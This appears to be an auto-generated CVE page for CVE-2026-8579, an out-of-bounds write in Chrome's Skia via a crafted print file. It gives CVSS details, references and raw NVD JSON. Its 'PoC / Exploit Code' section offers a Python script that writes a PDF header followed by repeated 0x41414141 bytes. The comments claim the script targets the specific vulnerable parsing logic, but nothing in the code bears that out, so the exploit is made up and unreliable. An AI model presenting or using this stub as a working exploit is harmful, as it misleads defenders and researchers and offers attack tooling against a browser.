CVE-2026-8579

Description

Insufficient validation of untrusted input in Skia in Google Chrome prior to 148.0.7778.168 allowed a remote attacker who had compromised the renderer process to perform an out of bounds memory write via a crafted print file. (Chromium security severity: Medium)

CVSS Details

CVSS Score

3.1

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Google Chrome < 148.0.7778.168

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# Proof of Concept (Conceptual)
# This script attempts to generate a malformed print file structure
# that may trigger the Out-of-Bounds write in Skia prior to Chrome 148.0.7778.168.
# Note: Actual exploitation requires precise memory layout knowledge and a compromised renderer.

def create_malformed_print_file(filename):
    with open(filename, 'wb') as f:
        # Header simulating a valid print format to bypass initial checks
        header = b'%PDF-1.4\n'
        f.write(header)
        
        # Injecting crafted payload to trigger insufficient validation in Skia
        # This payload is designed to hit the specific vulnerable parsing logic
        malicious_payload = struct.pack('<I', 0x41414141) * 100  # Overflow trigger pattern
        
        # Appending payload to the end of file object stream
        f.write(b'1 0 obj\n')
        f.write(b'<< /Length ' + str(len(malicious_payload)).encode() + b' >>\n')
        f.write(b'stream\n')
        f.write(malicious_payload)
        f.write(b'endstream\n')
        f.write(b'endobj\n')
        
        print(f"[+] Malicious print file generated: {filename}")
        print("[!] Use this file within a compromised renderer context to test the vulnerability.")

if __name__ == "__main__":
    create_malformed_print_file("exploit_print.bin")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8579
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8579
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8579/
[4] VulDB https://vuldb.com/cve/CVE-2026-8579
[5] https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_12.html
[6] https://issues.chromium.org/issues/496526419

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8579", "sourceIdentifier": "[email protected]", "published": "2026-05-14T20:17:20.267", "lastModified": "2026-05-15T15:16:56.170", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient validation of untrusted input in Skia in Google Chrome prior to 148.0.7778.168 allowed a remote attacker who had compromised the renderer process to perform an out of bounds memory write via a crafted print file. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_12.html", "source": "[email protected]"}, {"url": "https://issues.chromium.org/issues/496526419", "source": "[email protected]"}]}}